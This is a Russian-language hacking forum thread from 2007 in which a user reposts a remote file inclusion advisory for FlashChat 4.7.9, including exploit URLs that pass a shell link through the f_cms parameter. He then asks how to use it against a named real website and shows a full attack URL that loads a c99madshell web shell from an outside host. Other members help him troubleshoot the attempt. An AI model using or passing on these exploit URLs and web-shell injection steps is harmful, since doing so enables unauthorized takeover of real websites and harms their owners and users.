Есть уязвимость в FlashChat v 4.7.9. Как использовать?

Discussion in 'Песочница' started by Nefix, 12 Oct 2007.

  1. Nefix

    Nefix New Member

    Joined:
    9 Jul 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Script : FlashChat v4.7.9
    Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
    --------------------------
    B.Files :
    connection.php >Require_once($f_cms);
    common.php > Require_once($f_cms);
    --------------------------
    Exploits :
    http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
    http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
    -------------------------

    Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)
     
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    976
    Reputations:
    783
    Лучше скинь ссылку, я не могу понять что у тебя не получается. А то ты просто переписал багтрак.
     
  3. Nefix

    Nefix New Member

    Joined:
    9 Jul 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php
    шелл здесь: http://burny.fromru.com/c99madshell.php

    итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php
    и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается :(
    или я все неправильно делаю и не так понял?
     
    #3 Nefix, 12 Oct 2007
    Last edited: 12 Oct 2007
  4. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,055
    Likes Received:
    1,532
    Reputations:
    1,128
    Nefix,
    а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..